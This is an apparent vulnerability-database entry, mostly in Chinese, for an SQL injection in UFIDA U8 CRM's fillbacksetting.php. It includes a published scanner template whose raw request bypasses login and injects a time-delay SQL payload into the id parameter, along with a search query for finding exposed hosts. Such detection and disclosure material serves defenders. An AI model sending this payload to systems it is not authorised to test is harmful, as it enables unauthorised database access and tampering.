yonyou-u8-crm-tb-sqli: UFIDA U8 CRM fillbacksetting.php - SQL Injection

日期: 2025-08-01 | 影响软件: yonyou-u8-crm-tb-sqli | POC: 已公开

漏洞描述

UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.

PoC代码[已公开]

id: yonyou-u8-crm-tb-sqli

info:
  name: UFIDA U8 CRM fillbacksetting.php - SQL Injection
  author: s4e-io
  severity: high
  description: |
    UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
  reference:
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="用友U8CRM"
  tags: yonyou,u8-crm,sqli,vuln

http:
  - raw:
      - |
        @timeout 20s
        GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=bgsesstimeout-;

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(body, "{\"success\":true}")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502210098444aca90f56115e2eaa6e223a91b2a91b514dd66e96cda6eed112dce6ad8a4022069650d565fe9facccd5bc5d5f11d9234424c3c0296ebb8c7c9f842415df21372:922c64590222798bb761d5b6d8e72950

相关漏洞推荐